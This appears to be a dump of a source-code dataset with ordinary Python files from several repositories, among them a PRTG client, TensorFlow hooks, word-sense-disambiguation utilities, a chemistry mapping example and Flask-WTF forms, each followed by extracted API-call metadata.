if not 'status' in data or not data['status']:
data['status'] = 'dev-ing'
for member_id in data.pop('memberId'):
ActivityMember.get_or_create(
activityId=activity_id,
memberId=member_id,
role=ProjectMember.get(
(ProjectMember.projectId == data['projectId'])
& (ProjectMember.memberId == member_id)).role)
if 'done_demand' in data:
demand_activity_done(activity_id, data.pop('done_demand'))
if 'demand' in data:
demand_activity_add(activity_id, data.pop('demand'))
if 'del_demand' in data:
demand_activity_del(activity_id, data.pop('del_demand'))
Activity.update(**data).where(Activity.id == activity_id).execute()
return {"msg": 'ok'}
@fresh_jwt_required
def activity_detail(activity_id):
'''查询活动详情
GET /api/activity/<int:activity_id>
'''
activity = Activity.findOne(Activity.id == activity_id)
activity['member'] = list(
ActivityMember.find(ActivityMember.role, User.username,
User.email, User.id).join(User)
.where(ActivityMember.activityId == activity_id))
activity['demand'] = list(
Demand.find().where(Demand.activityId == activity_id))
return activity
@fresh_jwt_required
def project_user(project_id):
'''查询项目成员'''
return {
"data":
list(
ProjectMember.find(
ProjectMember.role,
User).join(User).where(ProjectMember.projectId == project_id))
}
| [((42, 1, 42, 44), 'model.role.identity.check_permission', 'identity.check_permission', ({(42, 27, 42, 35): '"""create"""', (42, 37, 42, 43): '"""task"""'}, {}), "('create', 'task')", False, 'from model.role import identity\n'), ((65, 1, 65, 44), 'model.role.identity.check_permission', 'identity.check_permission', ({(65, 27, 65, 35): '"""update"""', (65, 37, 65, 43): '"""task"""'}, {}), "('update', 'task')", False, 'from model.role import identity\n'), ((101, 15, 101, 59), 'model.db.Activity.findOne', 'Activity.findOne', ({(101, 32, 101, 58): 'Activity.id == activity_id'}, {}), '(Activity.id == activity_id)', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((14, 17, 14, 51), 'model.db.Demand.get', 'Demand.get', ({(14, 28, 14, 50): 'Demand.id == demand_id'}, {}), '(Demand.id == demand_id)', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((24, 17, 24, 51), 'model.db.Demand.get', 'Demand.get', ({(24, 28, 24, 50): 'Demand.id == demand_id'}, {}), '(Demand.id == demand_id)', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((34, 17, 34, 51), 'model.db.Demand.get', 'Demand.get', ({(34, 28, 34, 50): 'Demand.id == demand_id'}, {}), '(Demand.id == demand_id)', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((48, 9, 48, 26), 'model.db.database.atomic', 'database.atomic', ({}, {}), '()', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((70, 9, 70, 26), 'model.db.database.atomic', 'database.atomic', ({}, {}), '()', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((49, 22, 49, 49), 'model.db.ActivityBase.create', 'ActivityBase.create', ({}, {}), '(**data)', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((55, 16, 59, 18), 'model.db.ActivityMember.create', 'ActivityMember.create', ({}, {}), "(**{'activityId': activity_id, 'memberId': member_id,\n 'role': role})", False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((107, 8, 107, 21), 'model.db.Demand.find', 'Demand.find', ({}, {}), '()', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((52, 23, 54, 56), 'model.db.ProjectMember.get', 'ProjectMember.get', ({(53, 20, 53, 64): "(ProjectMember.projectId == data['projectId'])", (54, 20, 54, 55): '(ProjectMember.memberId == member_id)'}, {}), "(ProjectMember.projectId == data['projectId'], \n ProjectMember.memberId == member_id)", False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((92, 8, 92, 31), 'model.db.Activity.update', 'Activity.update', ({}, {}), '(**data)', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((103, 8, 104, 48), 'model.db.ActivityMember.find', 'ActivityMember.find', ({(103, 28, 103, 47): 'ActivityMember.role', (103, 49, 103, 62): 'User.username', (104, 28, 104, 38): 'User.email', (104, 40, 104, 47): 'User.id'}, {}), '(ActivityMember.role, User.username, User.email, User.id)', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((83, 25, 85, 64), 'model.db.ProjectMember.get', 'ProjectMember.get', ({(84, 24, 85, 63): "((ProjectMember.projectId == data['projectId']) & (ProjectMember.memberId ==\n member_id))"}, {}), "((ProjectMember.projectId == data['projectId']) & (\n ProjectMember.memberId == member_id))", False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((117, 12, 119, 21), 'model.db.ProjectMember.find', 'ProjectMember.find', ({(118, 16, 118, 34): 'ProjectMember.role', (119, 16, 119, 20): 'User'}, {}), '(ProjectMember.role, User)', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n'), ((73, 16, 73, 39), 'model.db.ActivityMember.delete', 'ActivityMember.delete', ({}, {}), '()', False, 'from model.db import database, Activity, ActivityMember, Demand, ActivityBase, ProjectMember, User\n')] |
Rage-ops/Leetcode-Solutions | math/9. Palindrome number.py | 48d4ecbb92a0bb7a7bb74a1445b593a67357ac02 | # Easy
# https://leetcode.com/problems/palindrome-number/
# Time Complexity: O(log(x) to base 10)
# Space Complexity: O(1)
class Solution:
def isPalindrome(self, x: int) -> bool:
temp = x
rev = 0
while temp > 0:
rev = rev * 10 + temp % 10
temp //= 10
return rev == x | [] |
Eyepea/panoramisk | panoramisk/__init__.py | c10725e358f5b802faa9df1d22de6710927735a0 | from .manager import Manager # NOQA
from .call_manager import CallManager # NOQA
from . import fast_agi # NOQA
| [] |
kevinschoon/prtg-py | prtg/client.py | 714e0750606e55b2cd4c7dff8770d94057fa932b | # -*- coding: utf-8 -*-
"""
Python library for Paessler's PRTG (http://www.paessler.com/)
"""
import logging
import xml.etree.ElementTree as Et
from urllib import request
from prtg.cache import Cache
from prtg.models import Sensor, Device, Status, PrtgObject
from prtg.exceptions import BadTarget, UnknownResponse
class Connection(object):
"""
PRTG Connection Object
"""
def __init__(self):
self.response = list()
@staticmethod
def _encode_response(response, tag):
out = list()
if any([tag == 'devices', tag =='sensors']):
for item in response.findall('item'):
i = dict()
for attrib in item:
i[attrib.tag] = attrib.text
if tag == 'devices':
out.append(Device(**i))
if tag == 'sensors':
out.append(Sensor(**i))
if tag == 'status':
i = dict()
for item in response:
i[item.tag] = item.text
out.append(Status(**i))
if tag == 'prtg':
i = dict()
for item in response:
i[item.tag] = item.text
out.append(PrtgObject(**i))
return out
def _process_response(self, response, expect_return=True):
"""
Process the response from the server.
"""
if expect_return:
try:
resp = Et.fromstring(response.read().decode('utf-8'))
except Et.ParseError as e:
raise UnknownResponse(e)
try:
ended = resp.attrib['listend'] # Catch KeyError and return finished
except KeyError:
ended = 1
return self._encode_response(resp, resp.tag), ended
def _build_request(self, query):
"""
Build the HTTP request.
"""
req, method = str(query), query.method
logging.debug('REQUEST: target={} method={}'.format(req, method))
return request.Request(url=req, method=method)
def get_request(self, query):
"""
Make a single HTTP request
"""
req = self._build_request(query)
logging.info('Making request: {}'.format(query))
resp, ended = self._process_response(request.urlopen(req))
self.response += resp
if not int(ended): # Recursively request until PRTG indicates "listend"
query.increment()
self.get_request(query)
class Client(object):
def __init__(self, endpoint, username, password):
self.endpoint = endpoint
self.username = username
self.password = password
self.cache = Cache()
@staticmethod
def query(query):
conn = Connection()
conn.get_request(query)
return conn.response
"""
def refresh(self, query):
logging.info('Refreshing content: {}'.format(content))
devices = Query(target='table', endpoint=self.endpoint, username=self.username, password=self.password, content=content, counter=content)
self.connection.get_paginated_request(devices)
self.cache.write_content(devices.response)
def update(self, content, attribute, value, replace=False):
for index, obj in enumerate(content):
logging.debug('Updating object: {} with {}={}'.format(obj, attribute, value))
if attribute == 'tags':
tags = value.split(',')
if replace:
obj.tags = value.split(',')
else:
obj.tags += [x for x in tags if x not in obj.tags]
content[index] = obj
self.cache.write_content(content, force=True)
def content(self, content_name, parents=False, regex=None, attribute=None):
response = list()
for resp in self.cache.get_content(content_name):
if not all([regex, attribute]):
response.append(resp)
else:
if RegexMatch(resp, expression=regex, attribute=attribute):
response.append(resp)
if all([content_name == 'sensors', parents is True]):
logging.info('Searching for parents.. this may take a while')
p = list()
ids = set()
for index, child in enumerate(response):
parent = self.cache.get_object(str(child.parentid)) # Parent device.
if parent:
ids.add(str(parent.objid)) # Lookup unique parent ids.
else:
logging.warning('Unable to find sensor parent')
for parent in ids:
p.append(self.cache.get_object(parent))
response = p
return response
"""
| [((74, 15, 74, 54), 'urllib.request.Request', 'request.Request', (), '', False, 'from urllib import request\n'), ((95, 21, 95, 28), 'prtg.cache.Cache', 'Cache', ({}, {}), '()', False, 'from prtg.cache import Cache\n'), ((82, 45, 82, 65), 'urllib.request.urlopen', 'request.urlopen', ({(82, 61, 82, 64): 'req'}, {}), '(req)', False, 'from urllib import request\n'), ((40, 23, 40, 34), 'prtg.models.Status', 'Status', ({}, {}), '(**i)', False, 'from prtg.models import Sensor, Device, Status, PrtgObject\n'), ((46, 23, 46, 38), 'prtg.models.PrtgObject', 'PrtgObject', ({}, {}), '(**i)', False, 'from prtg.models import Sensor, Device, Status, PrtgObject\n'), ((60, 22, 60, 40), 'prtg.exceptions.UnknownResponse', 'UnknownResponse', ({(60, 38, 60, 39): 'e'}, {}), '(e)', False, 'from prtg.exceptions import BadTarget, UnknownResponse\n'), ((32, 31, 32, 42), 'prtg.models.Device', 'Device', ({}, {}), '(**i)', False, 'from prtg.models import Sensor, Device, Status, PrtgObject\n'), ((34, 31, 34, 42), 'prtg.models.Sensor', 'Sensor', ({}, {}), '(**i)', False, 'from prtg.models import Sensor, Device, Status, PrtgObject\n')] |
da-h/tf-boilerplate | template/misc.py | ab8409c935d3fcbed07bbefd1cb0049d45283222 | import tensorflow as tf
from tensorflow.python.training.session_run_hook import SessionRunArgs
# Define data loaders #####################################
# See https://gist.github.com/peterroelants/9956ec93a07ca4e9ba5bc415b014bcca
class IteratorInitializerHook(tf.train.SessionRunHook):
"""Hook to initialise data iterator after Session is created."""
def __init__(self, func=None):
super(IteratorInitializerHook, self).__init__()
self.iterator_initializer_func = func
def after_create_session(self, session, coord):
"""Initialise the iterator after the session has been created."""
self.iterator_initializer_func(session)
# redefine summarysaverhook (for more accurate saving)
class CustomSummarySaverHook(tf.train.SummarySaverHook):
"""Saves summaries every N steps."""
def __init__(self,save_steps,*args,**kwargs):
super(CustomSummarySaverHook, self).__init__(*args,save_steps=save_steps,**kwargs)
def begin(self):
super().begin()
self._timer.reset()
self._iter_count = 0
def before_run(self, run_context): # pylint: disable=unused-argument
self._request_summary = ((self._iter_count + 1) % self.save_steps == 0)
requests = {"global_step": self._global_step_tensor}
if self._request_summary:
if self._get_summary_op() is not None:
# print(self._iter_count)
requests["summary"] = self._get_summary_op()
return SessionRunArgs(requests)
def after_run(self, run_context, run_values):
super().after_run(run_context,run_values)
self._iter_count += 1
class OneTimeSummarySaverHook(tf.train.SummarySaverHook):
"""One-Time SummarySaver
Saves summaries every N steps.
E.g. can be used for saving the source code as text.
"""
def __init__(self, output_dir=None, summary_writer=None, scaffold=None, summary_op=None):
self._summary_op = summary_op
self._summary_writer = summary_writer
self._output_dir = output_dir
self._scaffold = scaffold
class emptytimer():
def update_last_triggered_step(*args,**kwargs):
pass
self._timer = emptytimer()
def begin(self):
super().begin()
self._done = False
def before_run(self, run_context): # pylint: disable=unused-argument
self._request_summary = not self._done
requests = {"global_step": self._global_step_tensor}
if self._request_summary:
if self._get_summary_op() is not None:
# print(self._iter_count)
requests["summary"] = self._get_summary_op()
return SessionRunArgs(requests)
def after_run(self, run_context, run_values):
super().after_run(run_context,run_values)
self._done = True
def ExperimentTemplate() -> str:
"""A template with Markdown syntax.
:return: str with Markdown template
"""
return """
Experiment
==========
Any [markdown code](https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet) can be used to describe this experiment.
For instance, you can find the automatically generated used settings of this run below.
Current Settings
----------------
| Argument | Value |
| -------- | ----- |
"""
| [((38, 15, 38, 39), 'tensorflow.python.training.session_run_hook.SessionRunArgs', 'SessionRunArgs', ({(38, 30, 38, 38): 'requests'}, {}), '(requests)', False, 'from tensorflow.python.training.session_run_hook import SessionRunArgs\n'), ((75, 15, 75, 39), 'tensorflow.python.training.session_run_hook.SessionRunArgs', 'SessionRunArgs', ({(75, 30, 75, 38): 'requests'}, {}), '(requests)', False, 'from tensorflow.python.training.session_run_hook import SessionRunArgs\n')] |
uibcdf/pyunitwizard | pyunitwizard/_private_tools/parsers.py | 54cdce7369e1f2a3771a1f05a4a6ba1d7610a5e7 | parsers = ['openmm.unit', 'pint', 'unyt']
def digest_parser(parser: str) -> str:
""" Check if parser is correct."""
if parser is not None:
if parser.lower() in parsers:
return parser.lower()
else:
raise ValueError
else:
from pyunitwizard.kernel import default_parser
return default_parser
| [] |
bartonlin/MWSD | metric_wsd/utils/data_utils.py | 70ad446ee7f00a11988acb290270e32d8e6af925 | '''
Copyright (c) Facebook, Inc. and its affiliates.
All rights reserved.
This source code is licensed under the license found in the
LICENSE file in the root directory of this source tree.
Code taken from: https://github.com/facebookresearch/wsd-biencoders/blob/master/wsd_models/util.py
'''
import os
import re
import torch
import subprocess
from transformers import *
import random
pos_converter = {'NOUN':'n', 'PROPN':'n', 'VERB':'v', 'AUX':'v', 'ADJ':'a', 'ADV':'r'}
def generate_key(lemma, pos):
if pos in pos_converter.keys():
pos = pos_converter[pos]
key = '{}+{}'.format(lemma, pos)
return key
def load_pretrained_model(name):
if name == 'roberta-base':
model = RobertaModel.from_pretrained('roberta-base')
hdim = 768
elif name == 'roberta-large':
model = RobertaModel.from_pretrained('roberta-large')
hdim = 1024
elif name == 'bert-large':
model = BertModel.from_pretrained('bert-large-uncased')
hdim = 1024
else: #bert base
model = BertModel.from_pretrained('bert-base-uncased')
hdim = 768
return model, hdim
def load_tokenizer(name):
if name == 'roberta-base':
tokenizer = RobertaTokenizer.from_pretrained('roberta-base')
elif name == 'roberta-large':
tokenizer = RobertaTokenizer.from_pretrained('roberta-large')
elif name == 'bert-large':
tokenizer = BertTokenizer.from_pretrained('bert-large-uncased')
else: #bert base
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
return tokenizer
def load_wn_senses(path):
wn_senses = {}
with open(path, 'r', encoding="utf8") as f:
for line in f:
line = line.strip().split('\t')
lemma = line[0]
pos = line[1]
senses = line[2:]
key = generate_key(lemma, pos)
wn_senses[key] = senses
return wn_senses
def get_label_space(data):
#get set of labels from dataset
labels = set()
for sent in data:
for _, _, _, _, label in sent:
if label != -1:
labels.add(label)
labels = list(labels)
labels.sort()
labels.append('n/a')
label_map = {}
for sent in data:
for _, lemma, pos, _, label in sent:
if label != -1:
key = generate_key(lemma, pos)
label_idx = labels.index(label)
if key not in label_map: label_map[key] = set()
label_map[key].add(label_idx)
return labels, label_map
def process_encoder_outputs(output, mask, as_tensor=False):
combined_outputs = []
position = -1
avg_arr = []
for idx, rep in zip(mask, torch.split(output, 1, dim=0)):
#ignore unlabeled words
if idx == -1: continue
#average representations for units in same example
elif position < idx:
position=idx
if len(avg_arr) > 0: combined_outputs.append(torch.mean(torch.stack(avg_arr, dim=-1), dim=-1))
avg_arr = [rep]
else:
assert position == idx
avg_arr.append(rep)
#get last example from avg_arr
if len(avg_arr) > 0: combined_outputs.append(torch.mean(torch.stack(avg_arr, dim=-1), dim=-1))
if as_tensor: return torch.cat(combined_outputs, dim=0)
else: return combined_outputs
#run WSD Evaluation Framework scorer within python
def evaluate_output(scorer_path, gold_filepath, out_filepath):
eval_cmd = ['java','-cp', scorer_path, 'Scorer', gold_filepath, out_filepath]
output = subprocess.Popen(eval_cmd, stdout=subprocess.PIPE ).communicate()[0]
output = [x.decode("utf-8") for x in output.splitlines()]
p,r,f1 = [float(output[i].split('=')[-1].strip()[:-1]) for i in range(3)]
return p, r, f1
def load_data(datapath, name):
text_path = os.path.join(datapath, '{}.data.xml'.format(name))
gold_path = os.path.join(datapath, '{}.gold.key.txt'.format(name))
#load gold labels
gold_labels = {}
with open(gold_path, 'r', encoding="utf8") as f:
for line in f:
line = line.strip().split(' ')
instance = line[0]
#this means we are ignoring other senses if labeled with more than one
#(happens at least in SemCor data)
key = line[1]
gold_labels[instance] = key
#load train examples + annotate sense instances with gold labels
sentences = []
s = []
with open(text_path, 'r', encoding="utf8") as f:
for line in f:
line = line.strip()
if line == '</sentence>':
sentences.append(s)
s=[]
elif line.startswith('<instance') or line.startswith('<wf'):
word = re.search('>(.+?)<', line).group(1)
lemma = re.search('lemma="(.+?)"', line).group(1)
pos = re.search('pos="(.+?)"', line).group(1)
#clean up data
word = re.sub(''', '\'', word)
lemma = re.sub(''', '\'', lemma)
sense_inst = -1
sense_label = -1
if line.startswith('<instance'):
sense_inst = re.search('instance id="(.+?)"', line).group(1)
#annotate sense instance with gold label
sense_label = gold_labels[sense_inst]
s.append((word, lemma, pos, sense_inst, sense_label))
return sentences
#normalize ids list, masks to whatever the passed in length is
def normalize_length(ids, attn_mask, o_mask, max_len, pad_id):
if max_len == -1:
return ids, attn_mask, o_mask
else:
if len(ids) < max_len:
while len(ids) < max_len:
ids.append(torch.tensor([[pad_id]]))
attn_mask.append(0)
o_mask.append(-1)
else:
ids = ids[:max_len-1]+[ids[-1]]
attn_mask = attn_mask[:max_len]
o_mask = o_mask[:max_len]
assert len(ids) == max_len
assert len(attn_mask) == max_len
assert len(o_mask) == max_len
return ids, attn_mask, o_mask
#filters down training dataset to (up to) k examples per sense
#for few-shot learning of the model
def filter_k_examples(data, k):
#shuffle data so we don't only get examples for (common) senses from beginning
random.shuffle(data)
#track number of times sense from data is used
sense_dict = {}
#store filtered data
filtered_data = []
example_count = 0
for sent in data:
filtered_sent = []
for form, lemma, pos, inst, sense in sent:
#treat unlabeled words normally
if sense == -1:
x = (form, lemma, pos, inst, sense)
elif sense in sense_dict:
if sense_dict[sense] < k:
#increment sense count and add example to filtered data
sense_dict[sense] += 1
x = (form, lemma, pos, inst, sense)
example_count += 1
else: #if the data already has k examples of this sense
#add example with no instance or sense label to data
x = (form, lemma, pos, -1, -1)
else:
#add labeled example to filtered data and sense dict
sense_dict[sense] = 1
x = (form, lemma, pos, inst, sense)
example_count += 1
filtered_sent.append(x)
filtered_data.append(filtered_sent)
print("k={}, training on {} sense examples...".format(k, example_count))
return filtered_data
#EOF
| [((186, 1, 186, 21), 'random.shuffle', 'random.shuffle', ({(186, 16, 186, 20): 'data'}, {}), '(data)', False, 'import random\n'), ((93, 27, 93, 56), 'torch.split', 'torch.split', (), '', False, 'import torch\n'), ((106, 22, 106, 56), 'torch.cat', 'torch.cat', (), '', False, 'import torch\n'), ((105, 57, 105, 85), 'torch.stack', 'torch.stack', (), '', False, 'import torch\n'), ((112, 10, 112, 61), 'subprocess.Popen', 'subprocess.Popen', (), '', False, 'import subprocess\n'), ((148, 11, 148, 39), 're.sub', 're.sub', ({(148, 18, 148, 26): '"""'"""', (148, 28, 148, 32): '"""\'"""', (148, 34, 148, 38): 'word'}, {}), '(\''\', "\'", word)', False, 'import re\n'), ((149, 12, 149, 41), 're.sub', 're.sub', ({(149, 19, 149, 27): '"""'"""', (149, 29, 149, 33): '"""\'"""', (149, 35, 149, 40): 'lemma'}, {}), '(\''\', "\'", lemma)', False, 'import re\n'), ((168, 15, 168, 39), 'torch.tensor', 'torch.tensor', ({(168, 28, 168, 38): '[[pad_id]]'}, {}), '([[pad_id]])', False, 'import torch\n'), ((99, 59, 99, 87), 'torch.stack', 'torch.stack', (), '', False, 'import torch\n'), ((143, 11, 143, 37), 're.search', 're.search', ({(143, 21, 143, 30): '""">(.+?)<"""', (143, 32, 143, 36): 'line'}, {}), "('>(.+?)<', line)", False, 'import re\n'), ((144, 12, 144, 44), 're.search', 're.search', ({(144, 22, 144, 37): '"""lemma="(.+?)\\""""', (144, 39, 144, 43): 'line'}, {}), '(\'lemma="(.+?)"\', line)', False, 'import re\n'), ((145, 11, 145, 41), 're.search', 're.search', ({(145, 21, 145, 34): '"""pos="(.+?)\\""""', (145, 36, 145, 40): 'line'}, {}), '(\'pos="(.+?)"\', line)', False, 'import re\n'), ((154, 18, 154, 56), 're.search', 're.search', ({(154, 28, 154, 49): '"""instance id="(.+?)\\""""', (154, 51, 154, 55): 'line'}, {}), '(\'instance id="(.+?)"\', line)', False, 'import re\n')] |
TorgeirUstad/dlite | examples/dehydrogenation/3-property-mappings/mappings_from_ontology/run_w_onto.py | 1d7b4ccec0e76799a25992534cd295a80d83878a | #!/usr/bin/env python3
from typing import Dict, AnyStr
from pathlib import Path
from ontopy import get_ontology
import dlite
from dlite.mappings import make_instance
# Setup dlite paths
thisdir = Path(__file__).parent.absolute()
rootdir = thisdir.parent.parent
workflow1dir = rootdir / '1-simple-workflow'
entitiesdir = rootdir / 'entities'
atomdata = workflow1dir / 'atomscaledata.json'
dlite.storage_path.append(f'{entitiesdir}/*.json')
# Define the calculation
def get_energy(reaction):
"""Calculates reaction energies with data from Substance entity
data is harvested from collection and mapped to Substance according to
mappings.
Args:
reaction: dict with names of reactants and products ase keys
and stochiometric coefficient as value
Negative stochiometric coefficients for reactants.
Positive stochiometric coefficients for products.
Returns:
reaction energy
"""
energy = 0
for label, n in reaction.items():
inst = make_instance(Substance, coll[label], mappings,
mapsTo=mapsTo)
energy+=n*inst.molecule_energy
return energy
# Import ontologies with mappings
molecules_onto = get_ontology(f'{thisdir}/mapping_mols.ttl').load()
reaction_onto = get_ontology(f'{thisdir}/mapping_substance.ttl').load()
# Convert to mappings to a single list of triples
mappings = list(molecules_onto.get_unabbreviated_triples())
mappings.extend(list(reaction_onto.get_unabbreviated_triples()))
# Obtain the Metadata to be mapped to each other
Molecule = dlite.get_instance('http://onto-ns.com/meta/0.1/Molecule')
Substance = dlite.get_instance('http://onto-ns.com/meta/0.1/Substance')
# Find mapping relation
# TODO: investigate what to do if the two cases
# use a different mappings relation. As of now it is a
# hard requirement that they use the same.
mapsTo = molecules_onto.mapsTo.iri
# Define where the molecule data is obtained from
# This is a dlite collection
coll = dlite.Collection(f'json://{atomdata}?mode=r#molecules', 0)
# input from chemical engineer, e.g. what are reactants and products
# reactants (left side of equation) have negative stochiometric coefficient
# products (right side of equation) have positive stochiometric coefficient
reaction1 = {'C2H6':-1, 'C2H4':1,'H2':1}
reaction_energy = get_energy(reaction1)
print('Reaction energy 1', reaction_energy)
reaction2 = {'C3H8':-1, 'H2': -2,'CH4':3}
reaction_energy2 = get_energy(reaction2)
print('Reaction energy 1', reaction_energy2)
# Map instance Molecule with label 'H2' to Substance
#inst = make_instance(Substance, coll['H2'], mappings)
#print(inst)
# Map instance Molecule with label 'H2' to itself
#inst2 = make_instance(Molecule, coll['H2'], mappings, strict=False)
#print(inst2)
| [((16, 0, 16, 50), 'dlite.storage_path.append', 'dlite.storage_path.append', ({(16, 26, 16, 49): 'f"""{entitiesdir}/*.json"""'}, {}), "(f'{entitiesdir}/*.json')", False, 'import dlite\n'), ((51, 11, 51, 69), 'dlite.get_instance', 'dlite.get_instance', ({(51, 30, 51, 68): '"""http://onto-ns.com/meta/0.1/Molecule"""'}, {}), "('http://onto-ns.com/meta/0.1/Molecule')", False, 'import dlite\n'), ((52, 12, 52, 71), 'dlite.get_instance', 'dlite.get_instance', ({(52, 31, 52, 70): '"""http://onto-ns.com/meta/0.1/Substance"""'}, {}), "('http://onto-ns.com/meta/0.1/Substance')", False, 'import dlite\n'), ((64, 7, 64, 65), 'dlite.Collection', 'dlite.Collection', ({(64, 24, 64, 61): 'f"""json://{atomdata}?mode=r#molecules"""', (64, 63, 64, 64): '0'}, {}), "(f'json://{atomdata}?mode=r#molecules', 0)", False, 'import dlite\n'), ((35, 15, 36, 43), 'dlite.mappings.make_instance', 'make_instance', (), '', False, 'from dlite.mappings import make_instance\n'), ((43, 17, 43, 60), 'ontopy.get_ontology', 'get_ontology', ({(43, 30, 43, 59): 'f"""{thisdir}/mapping_mols.ttl"""'}, {}), "(f'{thisdir}/mapping_mols.ttl')", False, 'from ontopy import get_ontology\n'), ((44, 16, 44, 64), 'ontopy.get_ontology', 'get_ontology', ({(44, 29, 44, 63): 'f"""{thisdir}/mapping_substance.ttl"""'}, {}), "(f'{thisdir}/mapping_substance.ttl')", False, 'from ontopy import get_ontology\n'), ((11, 10, 11, 24), 'pathlib.Path', 'Path', ({(11, 15, 11, 23): '__file__'}, {}), '(__file__)', False, 'from pathlib import Path\n')] |
lendoo73/my_idea_boxes | forms.py | c0d0e7bbd0b64ae35146f3792cd477d1ec8461b5 | from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed, FileRequired
from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField
from wtforms.fields.html5 import DateField, IntegerField
from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange
from models import Colleagues, Admins, Boxes, Ideas
class RegistrationFormCompany(FlaskForm):
company_name = StringField("Company name", validators = [DataRequired()])
user_name = StringField("Your User name", validators = [DataRequired()])
first_name = StringField("Your First name", validators = [DataRequired()])
last_name = StringField("Your Last name", validators = [DataRequired()])
position = StringField("Your Position", validators = [DataRequired()])
email = StringField("Email", validators = [DataRequired(), Email()])
founder_password = PasswordField("Your own Password", validators = [DataRequired()])
repeat_founder_password = PasswordField(
"Repeat Your Password",
validators = [DataRequired(),
EqualTo("founder_password")]
)
joining_password = PasswordField("Password for Colleagues to Joining", validators = [DataRequired()])
repeat_joining_password = PasswordField(
"Repeat Joining Password",
validators = [DataRequired(),
EqualTo("joining_password")]
)
submit = SubmitField("Register your Company")
class RegistrationFormColleague(FlaskForm):
company_name = StringField("Company name", validators = [DataRequired()])
joining_password = PasswordField("Password for Colleagues to Joining", validators = [DataRequired()])
user_name = StringField("Your User name", validators = [DataRequired()])
email = StringField("Email", validators = [DataRequired(), Email()])
first_name = StringField("Your First name", validators = [DataRequired()])
last_name = StringField("Your Last name", validators = [DataRequired()])
position = StringField("Your Position", validators = [DataRequired()])
password = PasswordField("Your Password", validators = [DataRequired()])
repeat_password = PasswordField(
"Repeat Password",
validators = [DataRequired(),
EqualTo("password")]
)
submit = SubmitField("Register")
class LoginForm(FlaskForm):
email_or_user_name = StringField("Email or User name", validators = [DataRequired()])
password = PasswordField("Password", validators = [DataRequired()])
remember_me = BooleanField("Remember Me")
submit = SubmitField("Sign In")
class ConfirmEmailForm(FlaskForm):
email = HiddenField("Email")
code = IntegerField(
"Confirmation code",
validators = [
DataRequired(),
NumberRange(
min = 100000,
max = 999999,
message = "Please enter the 6 digits you received in the email."
)
]
)
submit = SubmitField("Confirm my Email")
class UpdateFirstNameForm(FlaskForm):
first_name = StringField("First Name", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdateLastNameForm(FlaskForm):
last_name = StringField("Last Name", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdateEmailForm(FlaskForm):
email = StringField("Email", validators = [DataRequired(), Email()])
password = PasswordField("Password", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdatePositionForm(FlaskForm):
position = StringField("Your Position", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdatePasswordForm(FlaskForm):
password = PasswordField("Your Current Password", validators = [DataRequired()])
new_password = PasswordField("Your New Password", validators = [DataRequired()])
repeat_new_password = PasswordField(
"Repeat your New Password",
validators = [DataRequired(),
EqualTo("repeat_new_password")]
)
submit = SubmitField("Update")
allowed_format = ['png', 'svg', 'jpg', "jpeg"]
class UpdateAvatarForm(FlaskForm):
avatar = FileField(
"Choose an Avatar:",
validators = [
FileRequired(),
FileAllowed(allowed_format, f"Wrong format! Allowed: {allowed_format}.")
]
)
submit = SubmitField("Upload Avatar")
class DeleteColleagueForm(FlaskForm):
password = PasswordField("Your Password", validators = [DataRequired()])
submit = SubmitField("Delete Registration")
class UpdateLogoForm(FlaskForm):
logo = FileField(
"Choose your Company Logo:",
validators = [
FileRequired(),
FileAllowed(allowed_format, f"Wrong format! Allowed: {allowed_format}.")
]
)
submit = SubmitField("Upload Logo")
class UpdateCompanyNameForm(FlaskForm):
company_name = StringField("Company Name", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdateJoiningPasswordForm(FlaskForm):
password = PasswordField("Current Joining Password", validators = [DataRequired()])
new_password = PasswordField("New Joining Password", validators = [DataRequired()])
repeat_new_password = PasswordField(
"Repeat New Password",
validators = [DataRequired(),
EqualTo("repeat_new_password")]
)
submit = SubmitField("Update")
class UpdatePrivilegsForm(FlaskForm):
update_company = BooleanField("Update Company")
update_privilegs = BooleanField("Update Privilegs")
update_colleague = BooleanField("Update Colleague")
update_box = BooleanField("Update Idea Box")
password = PasswordField("Your Password", validators = [DataRequired()])
submit = SubmitField("Update Privilegs")
class CreateBoxForm(FlaskForm):
name = StringField("Title", validators = [DataRequired()])
description = TextAreaField("Description", validators = [DataRequired()])
close_at = DateField("Close at", format = "%Y-%m-%d")
submit = SubmitField("Create Box")
class CreateIdeaForm(FlaskForm):
idea = TextAreaField("My Idea", validators= [DataRequired()])
sign = RadioField(
"Sign",
choices = [
("incognito", "incognito"),
("username", "username"),
("first name", "first name"),
("full name", "full name")
]
)
